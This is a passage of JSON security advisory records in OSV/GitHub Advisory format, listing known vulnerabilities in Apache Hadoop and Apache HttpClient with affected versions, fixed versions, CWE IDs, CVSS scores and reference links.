"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-v569-g72v-q434/GHSA-v569-g72v-q434.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.1" } ] } ], "versions": [ "2.9.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-v569-g72v-q434/GHSA-v569-g72v-q434.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1296" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-v569-g72v-q434" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a5b15bc76fbdad2ee40761aacf954a13aeef67e305f86d483f267e8e@%3Cuser.hadoop.apache.org%3E" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/106764" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], 
"github_reviewed": true, "github_reviewed_at": "2020-06-16T21:56:41Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-v5c9-98f7-2h54", "published": "2022-04-23T00:40:07Z", "modified": "2024-02-16T08:24:21.090651Z", "aliases": [ "CVE-2012-2945" ], "summary": "Hadoop symlink vulnerability", "details": "Hadoop 1.0.3 contains a symlink vulnerability as a result of storing pid files in the shared `/tmp` directory by default.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.0.4" } ] } ], "versions": [ "0.23.1", "0.23.10", "0.23.11", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.0.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-v5c9-98f7-2h54/GHSA-v5c9-98f7-2h54.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-2945" }, { "type": "WEB", "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=535861" }, { "type": "PACKAGE", "url": "https://github.com/apache/hadoop" }, { "type": "WEB", "url": "https://seclists.org/fulldisclosure/2012/Jul/3" }, { "type": "WEB", "url": "https://security-tracker.debian.org/tracker/CVE-2012-2945" } ], "database_specific": { "cwe_ids": [ "CWE-377", "CWE-59" ], "github_reviewed": true, "github_reviewed_at": "2023-08-29T19:54:42Z", "nvd_published_at": "2019-10-29T19:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2x83-r56g-cv47", "published": "2018-10-17T00:05:15Z", "modified": 
"2024-12-02T05:48:49.049751Z", "aliases": [ "CVE-2012-6153" ], "summary": "Improper certificate validation in org.apache.httpcomponents:httpclient", "details": "http/conn/ssl/AbstractVerifier.java in Apache Commons HttpClient before 4.2.3 does not properly verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a certificate with a subject that specifies a common name in a field that is not the CN field. NOTE: this issue exists because of an incomplete fix for CVE-2012-5783.", "affected": [ { "package": { "name": "org.apache.httpcomponents:httpclient", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.httpcomponents/httpclient" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.2.3" } ] } ], "versions": [ "4.0", "4.0-alpha1", "4.0-alpha2", "4.0-alpha3", "4.0-alpha4", "4.0-beta1", "4.0-beta2", "4.0.1", "4.0.2", "4.0.3", "4.1", "4.1-alpha1", "4.1-alpha2", "4.1-beta1", "4.1.1", "4.1.2", "4.1.3", "4.2", "4.2-alpha1", "4.2-beta1", "4.2.1", "4.2.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-2x83-r56g-cv47/GHSA-2x83-r56g-cv47.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-6153" }, { "type": "WEB", "url": "https://github.com/apache/httpcomponents-client/commit/6e14fc146a66e0f3eb362f45f95d1a58ee18886a" }, { "type": "WEB", "url": "https://github.com/apache/httpcomponents-client/commit/b930227f907af1198765fc47beabbddae344ca7b" }, { "type": "WEB", "url": "https://access.redhat.com/solutions/1165533" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1129916" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-2x83-r56g-cv47" }, { "type": "WEB", "url": 
"https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05103564" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1098.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1833.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1834.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1835.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1836.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1891.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1892.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0125.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0158.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0675.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0720.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0765.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0850.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0851.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-1888.html" }, { "type": "WEB", "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1411705" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-2769-1" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:53:18Z", "nvd_published_at": null, "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-7r82-7xv7-xcpj", "published": "2021-06-03T23:40:23Z", "modified": "2024-03-15T05:19:17.323914Z", "aliases": [ "CVE-2020-13956" ], "related": [ "CGA-6936-26rm-54qh", "CGA-7v36-x4w2-722q" ], "summary": "Cross-site scripting in Apache HttpClient", "details": "Apache HttpClient versions prior to version 4.5.13 and 5.0.3 can misinterpret malformed authority 
component in request URIs passed to the library as java.net.URI object and pick the wrong target host for request execution.", "affected": [ { "package": { "name": "org.apache.httpcomponents:httpclient", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.httpcomponents/httpclient" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.5.13" } ] } ], "versions": [ "4.0", "4.0-alpha1", "4.0-alpha2", "4.0-alpha3", "4.0-alpha4", "4.0-beta1", "4.0-beta2", "4.0.1", "4.0.2", "4.0.3", "4.1", "4.1-alpha1", "4.1-alpha2", "4.1-beta1", "4.1.1", "4.1.2", "4.1.3", "4.2", "4.2-alpha1", "4.2-beta1", "4.2.1", "4.2.2", "4.2.3", "4.2.4", "4.2.5", "4.2.6", "4.3", "4.3-alpha1", "4.3-beta1", "4.3-beta2", "4.3.1", "4.3.2", "4.3.3", "4.3.4", "4.3.5", "4.3.6", "4.4", "4.4-alpha1", "4.4-beta1", "4.4.1", "4.5", "4.5.1", "4.5.10", "4.5.11", "4.5.12", "4.5.2", "4.5.3", "4.5.4", "4.5.5", "4.5.6", "4.5.7", "4.5.8", "4.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-7r82-7xv7-xcpj/GHSA-7r82-7xv7-xcpj.json" } }, { "package": { "name": "org.apache.httpcomponents:httpclient", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.httpcomponents/httpclient" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "5.0.0" }, { "fixed": "5.0.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-7r82-7xv7-xcpj/GHSA-7r82-7xv7-xcpj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13956" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re504acd4d63b8df2a7353658f45c9a3137e5f80e41cf7de50058b2c1@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd5ab56beb2ac6879f6ab427bc4e5f7691aed8362d17b713f61779858@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcd9ad5dda60c82ab0d0c9bd3e9cb1dc740804451fc20c7f451ef5cc4@%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcced7ed3237c29cd19c1e9bf465d0038b8b2e967b99fc283db7ca553@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc990e2462ec32b09523deafb2c73606208599e196fa2d7f50bdbc587@%3Cissues.maven.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc5c6ccb86d2afe46bbd4b71573f0448dc1f87bbcd5a0d8c7f8f904b2@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc505fee574fe8d18f9b0c655a4d120b0ae21bb6a73b96003e1d9be35@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc3739e0ad4bcf1888c6925233bfc37dd71156bbc8416604833095c42@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc0863892ccfd9fd0d0ae10091f24ee769fb39b8957fe4ebabfc11f17@%3Cdev.jackrabbit.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb725052404fabffbe093c83b2c46f3f87e12c3193a82379afbc529f8@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb4ba262d6f08ab9cf8b1ebbcd9b00b0368ffe90dad7ad7918b4b56fc@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb33212dab7beccaf1ffef9b88610047c644f644c7a0ebdc44d77e381@%3Ccommits.turbine.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rae14ae25ff4a60251e3ba2629c082c5ba3851dfd4d21218b99b56652@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rad6222134183046f3928f733bf680919e0c390739bfbfe6c90049673@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", 
"url": "https://lists.apache.org/thread.html/ra8bc6b61c5df301a6fe5a716315528ecd17ccb8a7f907e24a47a1a5e@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rea3dbf633dde5008d38bf6600a3738b9216e733e03f9ff7becf79625@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ree942561f4620313c75982a4e5f3b74fe6f7062b073210779648eec2@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reef569c2419705754a3acf42b5f19b2a158153cef0e448158bc54917@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf03228972e56cb4a03e6d9558188c2938078cf3ceb23a3fead87c9ca@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf43d17ed0d1fb4fb79036b582810ef60b18b1ef3add0d5dea825af1e@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf4db88c22e1be9eb60c7dc623d0528642c045fb196a24774ac2fa3a3@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf7ca60f78f05b772cc07d27e31bcd112f9910a05caf9095e38ee150f@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfb35f6db9ba1f1e061b63769a4eff5abadcc254ebfefc280e5a0dcf1@%3Ccommits.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfbedcb586a1e7dfce87ee03c720e583fc2ceeafa05f35c542cecc624@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfc00884c7b7ca878297bffe45fcb742c362b00b26ba37070706d44c3@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220210-0002" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": 
"https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4850b3fbaea02fde2886e461005e4af8d37c80a48b3ce2a6edca0e30@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3f740e4c38bba1face49078aa5cbeeb558c27be601cc9712ad2dcd1e@%3Ccommits.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3cecd59fba74404cbf4eb430135e1080897fb376f111406a78bed13a@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r34efec51cb817397ccf9f86e25a75676d435ba5f83ee7b2eabdad707@%3Ccommits.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r34178ab6ef106bc940665fd3f4ba5026fac3603b3fa2aefafa0b619d@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2dc7930b43eadc78220d269b79e13ecd387e4bee52db67b2f47d4303@%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2a03dc210231d7e852ef73015f71792ac0fcaca6cccc024c522ef17d@%3Ccommits.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2835543ef0f91adcc47da72389b816e36936f584c7be584d2314fac3@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r132e4c6a560cfc519caa1aaee63bdd4036327610eadbd89f76dd5457@%3Cdev.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r12cb62751b35bdcda0ae2a08b67877d665a1f4d41eee0fa7367169e0@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0bebe6f9808ac7bdf572873b4fa96a29c6398c90dab29f131f3ebffe@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r0a75b8f0f72f3e18442dc56d33f3827b905f2fe5b7ba48997436f5d1@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r06cf3ca5c8ceb94b39cd24a73d4e96153b485a7dac88444dd876accb@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r043a75acdeb52b15dd5e9524cdadef4202e6a5228644206acf9363f9@%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r03bbc318c81be21f5c8a9b85e34f2ecc741aa804a8e43b0ef2c37749@%3Cissues.maven.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/httpcomponents-client" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra539f20ef0fb0c27ee39945b5f56bf162e5c13d1c60f7344dab8de3b@%3Cissues.maven.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9e52a6c72c8365000ecd035e48cc9fee5a677a150350d4420c46443d@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8aa1e5c343b89aec5b69961471950e862f15246cb6392910161c389b@%3Cissues.maven.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r87ddc09295c27f25471269ad0a79433a91224045988b88f0413a97ec@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70c429923100c5a4fae8e5bc71c8a2d39af3de4888f50a0ac3755e6f@%3Ccommits.creadur.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6eb2dae157dbc9af1f30d1f64e9c60d4ebef618f3dce4a0e32d6ea4d@%3Ccommits.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6dab7da30f8bf075f79ee189e33b45a197502e2676481bb8787fc0d7%40%3Cdev.hc.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d672b46622842e565e00f6ef6bef83eb55d8792aac2bee75bff9a2a@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r6a3cda38d050ebe13c1bc9a28d0a8ec38945095d07eca49046bcb89f@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r69a94e2f302d1b778bdfefe90fcb4b8c50b226438c3c8c1d0de85a19@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r63296c45d5d84447babaf39bd1487329d8a80d8d563e67a4b6f3d8a7@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5fec9c1d67f928179adf484b01e7becd7c0a6fdfe3a08f92ea743b90@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5de3d3808e7b5028df966e45115e006456c4e8931dc1e29036f17927@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5b55f65c123a7481104d663a915ec45a0d103e6aaa03f42ed1c07a89@%3Cdev.jackrabbit.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r55b2a1d1e9b1ec9db792b93da8f0f99a4fd5a5310b02673359d9b4d1@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r549ac8c159bf0c568c19670bedeb8d7c0074beded951d34b1c1d0d05@%3Cdev.drill.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2021-04-12T22:25:52Z", "nvd_published_at": "2020-12-02T17:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cfh5-3ghh-wfjx", "published": "2018-10-17T00:05:06Z", "modified": "2024-12-03T06:09:02.246830Z", "aliases": [ "CVE-2014-3577" ], "summary": "Improper Verification of Cryptographic Signature in org.apache.httpcomponents:httpclient", "details": "org.apache.http.conn.ssl.AbstractVerifier in Apache HttpComponents HttpClient before 4.3.5 and HttpAsyncClient before 4.0.2 does not properly verify that the server hostname matches a domain name in the subject's Common Name 
(CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a \"CN=\" string in a field in the distinguished name (DN) of a certificate, as demonstrated by the \"foo,CN=www.apache.org\" string in the O field.", "affected": [ { "package": { "name": "org.apache.httpcomponents:httpclient", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.httpcomponents/httpclient" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.3.5" } ] } ], "versions": [ "4.0", "4.0-alpha1", "4.0-alpha2", "4.0-alpha3", "4.0-alpha4", "4.0-beta1", "4.0-beta2", "4.0.1", "4.0.2", "4.0.3", "4.1", "4.1-alpha1", "4.1-alpha2", "4.1-beta1", "4.1.1", "4.1.2", "4.1.3", "4.2", "4.2-alpha1", "4.2-beta1", "4.2.1", "4.2.2", "4.2.3", "4.2.4", "4.2.5", "4.2.6", "4.3", "4.3-alpha1", "4.3-beta1", "4.3-beta2", "4.3.1", "4.3.2", "4.3.3", "4.3.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-cfh5-3ghh-wfjx/GHSA-cfh5-3ghh-wfjx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-3577" }, { "type": "WEB", "url": "https://github.com/apache/httpcomponents-client/commit/51cc67567765d67f878f0dcef61b5ded454d3122" }, { "type": "WEB", "url": "https://svn.apache.org/viewvc?view=revision\u0026revision=1614064" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231027-0003" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rff42cfa5e7d75b7c1af0e37589140a8f1999e578a75738740b244bd4@%3Ccommits.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfb87e0bf3995e7d560afeed750fac9329ff5f1ad49da365129b7f89e@%3Ccommits.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rec7160382badd3ef4ad017a22f64a266c7188b9ba71394f0d321e2d4@%3Ccommits.cxf.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rd49aabd984ed540c8ff7916d4d79405f3fa311d2fdbcf9ed307839a6@%3Ccommits.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc774278135816e7afc943dc9fc78eb0764f2c84a2b96470a0187315c@%3Ccommits.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r36e44ffc1a9b365327df62cdfaabe85b9a5637de102cea07d79b2dbf@%3Ccommits.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/httpcomponents-client" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-cfh5-3ghh-wfjx" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/95327" }, { "type": "WEB", "url": "https://access.redhat.com/solutions/1165533" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00032.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00033.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/127913/Apache-HttpComponents-Man-In-The-Middle.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1146.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1166.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1833.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1834.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1835.html" }, { "type": "WEB", "url": 
"http://rhn.redhat.com/errata/RHSA-2014-1836.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1891.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1892.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0125.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0158.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0675.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0720.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0765.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0850.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0851.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-1176.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-1177.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-1888.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1773.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2016-1931.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2014/Aug/48" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/10/06/1" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-2769-1" } ], "database_specific": { "cwe_ids": [ "CWE-347" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:31:17Z", "nvd_published_at": "2014-08-21T14:55:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-fmj5-wv96-r2ch", "published": "2018-10-17T00:05:29Z", "modified": "2024-12-08T05:23:13.492634Z", "aliases": [ "CVE-2015-5262" ], "summary": "Denial of service vulnerability in org.apache.httpcomponents:httpclient", "details": "http/conn/ssl/SSLConnectionSocketFactory.java in Apache 
HttpComponents HttpClient before 4.3.6 ignores the http.socket.timeout configuration setting during an SSL handshake, which allows remote attackers to cause a denial of service (HTTPS call hang) via unspecified vectors.", "affected": [ { "package": { "name": "org.apache.httpcomponents:httpclient", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.httpcomponents/httpclient" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.3.6" } ] } ], "versions": [ "4.0", "4.0-alpha1", "4.0-alpha2", "4.0-alpha3", "4.0-alpha4", "4.0-beta1", "4.0-beta2", "4.0.1", "4.0.2", "4.0.3", "4.1", "4.1-alpha1", "4.1-alpha2", "4.1-beta1", "4.1.1", "4.1.2", "4.1.3", "4.2", "4.2-alpha1", "4.2-beta1", "4.2.1", "4.2.2", "4.2.3", "4.2.4", "4.2.5", "4.2.6", "4.3", "4.3-alpha1", "4.3-beta1", "4.3-beta2", "4.3.1", "4.3.2", "4.3.3", "4.3.4", "4.3.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-fmj5-wv96-r2ch/GHSA-fmj5-wv96-r2ch.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-5262" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1261538" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-fmj5-wv96-r2ch" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/HTTPCLIENT-1478" }, { "type": "WEB", "url": "https://jenkins.io/security/advisory/2018-02-26" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": 
